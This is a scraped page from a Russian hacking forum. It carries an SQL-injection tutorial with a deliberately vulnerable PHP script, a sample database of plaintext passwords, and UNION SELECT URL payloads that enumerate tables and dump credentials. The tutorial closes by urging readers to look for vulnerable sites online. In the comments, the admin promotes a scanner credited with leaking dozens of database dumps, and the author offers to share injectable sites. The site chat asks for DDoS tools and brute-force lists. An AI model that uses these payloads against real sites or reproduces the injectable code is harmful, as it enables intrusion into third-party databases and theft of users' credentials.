Для доступа к контенту сайта, пожалуйста отключите Аd-Blосk. При включенном блокираторе сайт может работать не корректно.

Реклама
Новые комментарии
  • gass509
    Написал(а): gass509
  • ziqp
    Написал(а): ziqp
    В новости: Carberp (source code)
  • Drdrill
    Написал(а): Drdrill
    В новости: Mini Generator By NEO
  • KenanTube
    Написал(а): KenanTube
    В новости: Anonymous External Attack
  • KenanTube
    Написал(а): KenanTube
  • KenanTube
    Написал(а): KenanTube
    В новости: Anonymous DoSer
Доска почёта
Посетители
Счётчики



ТИЦ сайта
Чат

Чтобы оставлять сообщения - зарегистрируйтесь
  • MaxTrader
    14:01
    дратуте
    • Satvo
      13:58
      Всем привет
      • Olmiki
        00:36
        ей народ, уто что слышал про ботнеты для майнинга? кто чем может поделиться - пишите в ЛС)
        • sweetlou
          6 дек 2016, 17:58
          @krasavch1k_2014, R код? Это же от мобильного аутентификатора
          • krasavch1k_2014
            6 дек 2016, 17:09
            Привет народ, подскажите пожалуйста. Как восстановить аккаунт steam с помощью R кода восстановления ?
            • lolpika
              6 дек 2016, 15:59
              где тут сниффер
              • sweetlou
                6 дек 2016, 15:48
                @Shimikami, hay
                • Shimikami
                  6 дек 2016, 14:20
                  qq all
                  • аксакал
                    6 дек 2016, 14:10
                    да здесь не дождеся помоши,всем пока
                    • rusic79
                      6 дек 2016, 13:59
                      Цитата: rusic79
                      Цитата: rusic79
                      Друзья может у кого то завалялась база jabber ?
                      • Drdrill
                        6 дек 2016, 13:58
                        Кто не будь может помочь освоится в ollyDbg ?
                        • pH 5.5
                          6 дек 2016, 13:34
                          левый вписать ?
                          • pH 5.5
                            6 дек 2016, 13:33
                            бл**ь при реге на палке надо снилс омс и инн ...хотя есть права и паспорт ....ПОМОГИТЕ что делать ???
                            • rusic79
                              6 дек 2016, 13:22
                              Цитата: rusic79
                              Друзья может у кого то завалялась база jabber ?
                              • аксакал
                                6 дек 2016, 13:17
                                отблагодарю дедиком
                                • аксакал
                                  6 дек 2016, 13:07
                                  привет всем! помогите советом, маскан не сканит порт 3389,другие норм,что может быть
                                  • rusic79
                                    6 дек 2016, 13:01
                                    Цитата: rusic79
                                    Друзья может у кого то завалялась база jabber ?
                                    • Хулиган15
                                      6 дек 2016, 11:58
                                      • rusic79
                                        6 дек 2016, 11:57
                                        Друзья может у кого то завалялась база jabber ?
                                        • pH 5.5
                                          6 дек 2016, 10:01
                                          всем привет
                                          • lolpika
                                            6 дек 2016, 04:06
                                            где сниффер найти
                                            • iDroid
                                              5 дек 2016, 21:13
                                              @sweetlou, я с дедиков ебошил, ало, впн, плсю индийский дедик, изи
                                              • savinini
                                                5 дек 2016, 21:11
                                                @GRABBITZ, если выхлоп хороший хочешь, то только покупать
                                                • GRABBITZ
                                                  5 дек 2016, 21:06
                                                  Привет, где можно найти базы данных для брута steam?
                                                  • WAWILon
                                                    5 дек 2016, 20:54
                                                    @KaSeR, есть ещё такие сайты
                                                    • savinini
                                                      5 дек 2016, 19:55
                                                      Доброго времени суток товарищи хаЦкеры, требуется помощь, кто шарит в сокрытии файлов от диспетчера задач и прочее по этой теме отстучите пжлст в лс, есть работка небольшая, "скрипт" написать один, работу оплачу
                                                      • KaSeR
                                                        5 дек 2016, 19:52
                                                        Ну что? Happy-hack помер?
                                                        • minion123
                                                          5 дек 2016, 19:51
                                                          привет
                                                          • fenommen
                                                            5 дек 2016, 17:38
                                                            @KenanTube, скайп скинь - помогу
                                                            • KenanTube
                                                              5 дек 2016, 16:56
                                                              Кто знает норм прогу для DDOS атак?
                                                              Опрос на сайте
                                                              Как Вы нашли нас?
                                                              Поисковые системы
                                                              Порекомендовали
                                                              По ссылке с других сайтов
                                                              По ссылке с соц. сетей
                                                              Давно тут, по закладке
                                                              Ярлык в архиве с софтом
                                                              Случайно

                                                              Подписки

                                                                Получать новости на email:


                                                                Мы в соц. сетях:

                                                              Реклама

                                                              Последние сообщения с форума

                                                              Название темы Автор Статистика Последнее сообщение
                                                              Каждому по Battlefield 3 с Полным доступом

                                                              Тема в разделе: Халява

                                                              kot2566

                                                              Просмотров: 16726

                                                              Ответов: 330

                                                              Автор: fortiano3

                                                              Сегодня, 17:22

                                                              Продажа аккаунтов ВК по критериям пол,город,возраст,друзья. Продажа купонов

                                                              Тема в разделе: Аккаунты (купля/продажа)

                                                              kupondarom999

                                                              Просмотров: 946

                                                              Ответов: 11

                                                              Автор: kupondarom999

                                                              Сегодня, 17:01

                                                              Раздача алмазов Best-GamePortal

                                                              Тема в разделе: Халява

                                                              lozkaa

                                                              Просмотров: 28

                                                              Ответов: 2

                                                              Автор: lozkaa

                                                              Сегодня, 16:39

                                                              SQL-INJECTION
                                                              Автор: Abrazor | Дата: 5-07-2012, 19:15 | Комментариев: 17 | Просмотров: 7459
                                                              Уязвимость SQL-injection
                                                              Введение
                                                              В данной работе на примере исследуется уязвимость типа SQL Injection с использованием СУБД MySQL и PHP скриптов. Соответственно, для понимания происходящего требуются знания языка запросов SQL и языка php. После теоретической части будут приведены примеры кода и будет описано как все это можно проверить у себя на локальной машине с использованием комплекса DENWER под ОС Windows, хотя можно проделать тоже саоме и под другую ОС, например Linux, используя ту же базу данных MySQL. Т.е. для данного эксперимента потребуется:
                                                              Веб-сервер Apache
                                                              PHP, прикрученный к apache
                                                              СУБД MySQL
                                                              Атака типа SQL Injection — один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода. Это атака, при которой производится вставка вредоносного кода в строки, передающиеся затем в базу MySQL, для синтаксического анализа и выполнения. Эта уязвимость может дать возможность атакующему выполнить произвольный запрос к базе данных (например, прочитать содержимое любых таблиц, удалить, изменить или добавить данные), получить возможность чтения и/или записи локальных файлов и выполнения произвольных команд на атакуемом сервере.
                                                              Основная форма атаки SQL Injection состоит в прямой вставке кода в пользовательские входные переменные, которые объединяются с командами SQL и выполняются. Менее явная атака внедряет небезопасный код в строки, предназначенные для хранения в таблице или в виде метаданных. Когда впоследствии сохраненные строки объединяются с динамической командой SQL, происходит выполнение небезопасного кода.
                                                              Атака осуществляется посредством преждевременного завершения текстовой строки и присоединения к ней новой команды. Поскольку к вставленной команде перед выполнением могут быть добавлены дополнительные строки, злоумышленник заканчивает внедряемую строку меткой комментария «--». Весь последующий текст во время выполнения не учитывается.
                                                              Пример использования
                                                              В качестве примера, приведу маленький php скриптик. В нем новости выводятся из базы данных и отображаются пользователям. Но есть одна интересная вещь. Достаточно давно в PHP появилась такая штука, как магические кавычки — эффект автоматической замены кавычки на обратный слэш и кавычку при операциях ввода/вывода в PHP. Это сделано как раз для избежания sql injection у начинающих программистов. По умолчанию в конфиге php.ini данная функция включена. Нам же, для упрощения проведения испытаний надо ее выключить:
                                                              magic_quotes_gpc = Off в файле php.ini
                                                              Далее приведен пример скрипта index.php, для которого и возможно провести исследование уязвимости.
                                                              <?php
                                                              //Настройки БД
                                                              $script['mysql_server']='localhost';//Хост
                                                              $script['mysql_login']='root';//Логин
                                                              $script['mysql_password']='';//Пароль
                                                              $script['mysql_db']='test';//Имя БД

                                                              //Сам скрипт
                                                              $body="";
                                                              $body.="<html>
                                                              <head><title>Новости</title></head>
                                                              <body>
                                                              ";

                                                              mysql_connect($script['mysql_server'], $script['mysql_login'], $script['mysql_password']) or die('Не могу подключиться к серверу');
                                                              mysql_select_db($script['mysql_db']) or die('Не могу подключиться к БД');

                                                              if(!empty($_GET['id']))//Вывод одной новости
                                                              {
                                                                  $body.="<h3>Просмотр новости</h3> \n<br>";
                                                                  $id=$_GET['id'];
                                                                  //$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";
                                                                  //echo($id);
                                                                      //echo("<br>");   //  если это все раскомментировать то можно будет смотреть каким будет
                                                                      //echo($zapros);  //  запрос к базе, при изменения id в поле адреса браузера
                                                                      //echo("<br>");
                                                                  $zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";//Уязвимый запрос
                                                                  $result=mysql_query($zapros);
                                                                  echo(Mysql_error());//Вывод ошибки
                                                                  $data=mysql_fetch_row($result);
                                                                  //Вывод результата запроса
                                                                  $body.="Заголовок: <b>".$data['3']."</b>\n";
                                                                  $body.="<hr><pre>".$data['4']."</pre>\n";
                                                                  $body.="<hr>Добавленно ".$data['5']." ".$data['1']." в ".$data['2']."\n<br><br>";
                                                                  $body.="<a href='?'>Назад</a>";
                                                              }
                                                              else //Ну и простое отображение всех новостей(шоб понятней было где скуль)
                                                              {

                                                                  $body.="<h3>Все новости</h3> \n<br>";
                                                                  $zapros="SELECT * FROM news;";
                                                                  $result_z=mysql_query($zapros);
                                                                  $count_str=mysql_num_rows($result_z);
                                                                  for($i=1;$i<=$count_str;$i++)
                                                                  {
                                                                      [email protected]_fetch_assoc($result_z);
                                                                      $body.=$i.".<a href='?id=".$i."'>".$result['caption']."<a/><br>\n";
                                                                  }
                                                              }
                                                              $body.="</body></html>";
                                                              echo($body);
                                                              ?>

                                                              Далее приводится дамп базы данных test, из которой выбираются данные в этом скрипте. Тут есть 2 таблицы: users и news, из которых и выбираются данные в запросах.
                                                              CREATE TABLE `news` (
                                                                `id` int(11) NOT NULL DEFAULT '0',
                                                                `date` varchar(8) NOT NULL DEFAULT '',
                                                                `time` varchar(7) NOT NULL DEFAULT '',
                                                                `caption` varchar(50) NOT NULL DEFAULT '',
                                                                `text` text NOT NULL,
                                                                `avtor` varchar(50) NOT NULL DEFAULT ''
                                                              ) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

                                                              INSERT INTO `news` VALUES (1, '01/04/09', '12:30', 'Превед :)', 'Хакнем скриптег! :)\r\nИ побыстрее а то малоли... :P', 'Бубл');
                                                              INSERT INTO `news` VALUES (2, '25/03/09', '11:10', 'БУгага', '=))) :))\r\nТолько за дизайн извиняюсь... както кривовато смотриться...', 'Бубл');

                                                              CREATE TABLE `users` (
                                                                `login` varchar(20) NOT NULL DEFAULT '',
                                                                `password` varchar(20) NOT NULL DEFAULT ''
                                                              ) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

                                                              INSERT INTO `users` VALUES ('Admin', 'PaSsWoRd');
                                                              INSERT INTO `users` VALUES ('User', '123456');
                                                              INSERT INTO `users` VALUES ('Looser', 'big_password');

                                                              Методы проведения
                                                              Как определить данный баг
                                                              Это довольно таки просто. Надо вставлять во все поля, переменные, куки двойную и одинарные кавычки. Начнем с вот такого скрипта
                                                              http://test1.ru/index.php?id=1

                                                              Соответетвенно оригинальный запрос выглядит так:
                                                              SELECT * FROM news WHERE id='1';

                                                              Для наглядности расскоментируем в скрипте index.php строки, тогда вверх втраницы будет отображаться здачение id, передаваемое из адресной строки браузера и сам запрос к базе данных.
                                                              //$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";
                                                                  //echo($id);
                                                                      //echo("<br>");   //  если это все раскомментировать то можно будет смотреть каким будет
                                                                      //echo($zapros);  //  запрос к базе, при изменения id в поле адреса браузера
                                                                      //echo("<br>");

                                                              Теперь мы допишем кавычку в переменную "id", вот так
                                                              http://test1.ru/index.php?id=1'

                                                              если переменная не фильтруется и включены сообщения об ошибках то вылезет что то наподобие:
                                                              mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

                                                              Так как в запросе к БД будет присутствовать лишняя кавычка:
                                                              SELECT * FROM news WHERE id='1'';

                                                              Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так:
                                                              http://test1.ru/index.php?id=1'; -- '

                                                              То есть запрос к БД станет вот таким:
                                                              SELECT * FROM news WHERE id='1'; -- '';

                                                              “--“ это знак начала комментария все после него будет отброшено, после него должен быть обязательно пробел и перед ним тоже). Таким образом для MYSQL запрос остается прежним и отобразиться тоже самое что и для
                                                              http://test1.ru/index.php?id=1

                                                              Как можно из этого извлечь что-то полезное
                                                              Для начала самое полезное это команда UNION. Модифицируем обращение к скрипту
                                                              http://test1.ru/index.php?id=1' UNION SELECT 1 -- '

                                                              Запрос к БД у нас получается вот таким:
                                                              SELECT * FROM news WHERE id='1' UNION SELECT 1 -- '';

                                                              Но есть одно ограничение -- количество столбцов до и после UNION должно быть одинаковым, соответственно его придется подбирать.
                                                              В нашем примере, как видно из дампа базы -- полей 6, соответственно нам подойдет
                                                              http://test1.ru/index.php?id=1' UNION SELECT 1,2,3,4,5,6 -- '

                                                              Результатом вывода такой команды будет то же что и должно выводиться без команды UNION. Но нам интересно увидеть какие-нибудь другие данные из базы, тогда заменим id=1 на id=-1 и продолжим. Причем заменять необязательно на -1, просто нужно выбрать такое значение которое не выбирается из БД, в нашем случае полей 6, так что может подойти любой значение больше 6 или меньше 1.
                                                              Рыщем по таблицам
                                                              Если есть доступ к INFORMATION_SCHEMA и если версия MYSQL >=5, то можно сделать так:
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 42,1 -- '';

                                                              Где 42,1 -- 42 - будет названием таблицы, причем нумерация идет с первой БД. Т.е. если есть несколько баз, то будут показываться таблицы из всех имеющихся баз данных -- нумерация сквозная. Естественно эти названия будут показываться в каком-то из полей вывода странички. Точнее они будут показываться в том поле, в которое мы поставили TABLE_NAME, то есть у нас название таблицы будет отображаться в поле номер 4, то есть вместо заголовка новости.
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 41,1 -- '';

                                                              Начиная с номера LIMIT 41,1 начинается искомая нами база данных test. Соответственно будут показываться названия таблиц базы данных в поле 4.
                                                              SQL-INJECTION

                                                              Если использовать такой запрос:
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 42,1 -- '';

                                                              То получим:
                                                              SQL-INJECTION

                                                              Так мы находим название таблицы. Далее находим названия полей и т.д. В результате можно получить какие-нибудь логины и пароли. На последнем этапе, зная названия таблиц и их полей можно сделать такой запрос. Мы попробуем просмотреть пользователей из таблицы users. Также можно было перебирать чтобы узнать названия полей таблицы, но мы сразу принали что это поля называются login и password.
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 1,1 -- '


                                                              В результате видим:
                                                              SQL-INJECTION

                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 2,1 -- '

                                                              В результате:
                                                              SQL-INJECTION

                                                              В результате выведутся login и password первого и второго пользователя. Они будут выводиться на тех местах, где должна изначально была выводиться информация из полей 3 и 4.
                                                              И самое интересное, если написать
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 0,1 -- '

                                                              Так мы увидим:
                                                              SQL-INJECTION

                                                              В результате мы можем узнать данные, которые не отображаются на сайте. В данном примере мы посмотрели админский пароль и может продолжать веселье =).
                                                              Ну а проверить свои силы можно поставив у себя на ПК Денвер ну или же искать в инете сайты с уязвимостями er
                                                              Пароль на все архивы "happy-hack.ru" либо "hh"





                                                              Поделись:
                                                              Здесь присутствуют:
                                                              На данный момент новость никто не просматривает.
                                                              Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
                                                              Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: herionv
                                                              • Дата: 5 июля 2012 19:52
                                                              • Новостей: 1
                                                              • Комментариев: 54
                                                              можно взять парсер, NetDevilz SQL scanner и Havij и не заморачивать себе голову

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:18
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Одно дело когда ты знаешь команды и как проводить атаку,а одно дело когда ты тыкнул на кнопку и оно 80%работы сделало тебе....ну вообщем палка двух концов...кому интересно тот почитает er

                                                              --------------------

                                                              Репутация: ( 2 )
                                                            • Offline Пользователь offline

                                                              • Написал: VADIMG
                                                              • Дата: 5 июля 2012 20:21
                                                              • Новостей: 1
                                                              • Комментариев: 19
                                                              +1, тема бестолковая, уже никто не раскручивает руками.

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:23
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              я еще раз говорю кому интересно как оно все происходит тот почитает ce

                                                              --------------------
                                                              Xaker2013 нравится это.
                                                              Copyright ©

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: Max7771
                                                              • Дата: 5 июля 2012 20:32
                                                              • Новостей: 0
                                                              • Комментариев: 15
                                                              Abrazor,
                                                              Прочитал))И это уже знал))Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт, с Havij такая же проблема ни разу ещё нормально взлом не прошёл.
                                                              P.S троли уепитесь АПстену =) dm

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:35
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Brutforce,
                                                              "некому" "тока" cap
                                                              ну и не удивительно что не интересно cv
                                                              а и забыл добавить,если тебе тема не интересна то не стоит писать в ней свои коменты которые больше похожи на кровавый высер педошкольника ei

                                                              --------------------

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:40
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Max7771,
                                                              ну если хочешь скину в личку пару сайтов на которых на ура проводится скул инжектион? cd

                                                              --------------------

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: herionv
                                                              • Дата: 6 июля 2012 00:38
                                                              • Новостей: 1
                                                              • Комментариев: 54
                                                              я хоть и пользуюсь готовыми программами, но всё равно прочитал.

                                                              Репутация: ( 106 )
                                                            • Offline Пользователь offline

                                                              • Написал: admin
                                                              • Дата: 6 июля 2012 02:05
                                                              • Новостей: 379
                                                              • Комментариев: 1376
                                                              Статья заебца,если не копипаст.. notbad

                                                              Репутация: ( 106 )
                                                            • Offline Пользователь offline

                                                              • Написал: admin
                                                              • Дата: 6 июля 2012 02:18
                                                              • Новостей: 379
                                                              • Комментариев: 1376
                                                              Цитата: Max7771
                                                              Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт

                                                              Братюнь,вот норм софтина,не один десяток дампов слито с её помощью если самому лень искать,просто выбираешь ключевик и парсишь поискоивк на уязвимости..

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 6 июля 2012 16:44
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              admin,
                                                              статейка копипаст okok
                                                              просто я по ней начал обучатся скул инжекту daaaaa

                                                              --------------------

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: Max7771
                                                              • Дата: 7 июля 2012 09:41
                                                              • Новостей: 0
                                                              • Комментариев: 15
                                                              admin,
                                                              Спасибо попробуем)))

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: kirkajkee
                                                              • Дата: 18 июля 2012 15:19
                                                              • Новостей: 0
                                                              • Комментариев: 11
                                                              admin, писани мне в асю 710554 я нашел пару десятков гудов, буду благодарен если научишь скл инъекции и поделюсь приват инфой))
                                                              ну или еще кто нибудь если хорошо шарит
                                                              так для общего развития хочется)

                                                              Репутация: ( 7 )
                                                            • Offline Пользователь offline

                                                              • Написал: sandra777
                                                              • Дата: 3 августа 2012 19:03
                                                              • Новостей: 15
                                                              • Комментариев: 117
                                                              Статья может быть и интересная, но сил до конца прочитать не хватает.

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: googlebot
                                                              • Дата: 4 августа 2012 17:16
                                                              • Новостей: 0
                                                              • Комментариев: 8
                                                              спасибо

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: Denemut
                                                              • Дата: 3 января 2013 03:28
                                                              • Новостей: 0
                                                              • Комментариев: 50
                                                              Пока в закладки, как время будет прочитаю чего там интересного есть :)

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: SlendeR
                                                              • Дата: 20 декабря 2013 22:20
                                                              • Новостей: 0
                                                              • Комментариев: 26
                                                              Цитата: admin
                                                              Цитата: Max7771
                                                              Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт

                                                              Братюнь,вот норм софтина,не один десяток дампов слито с её помощью если самому лень искать,просто выбираешь ключевик и парсишь поискоивк на уязвимости..

                                                              Чувак чувак чувак!!! Ты просто бог! Черт, я видос глядел, где эту софтину используют, а найти не мог! И тут искал, и везде как шнырь лазил... А попал сюда, почитал коммент, перешел по ссылке, и нашел! Черт, спасибо тебе что хуеву-тучу дней назад, ты написал этот коммент!!
                                                              Информация
                                                              Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.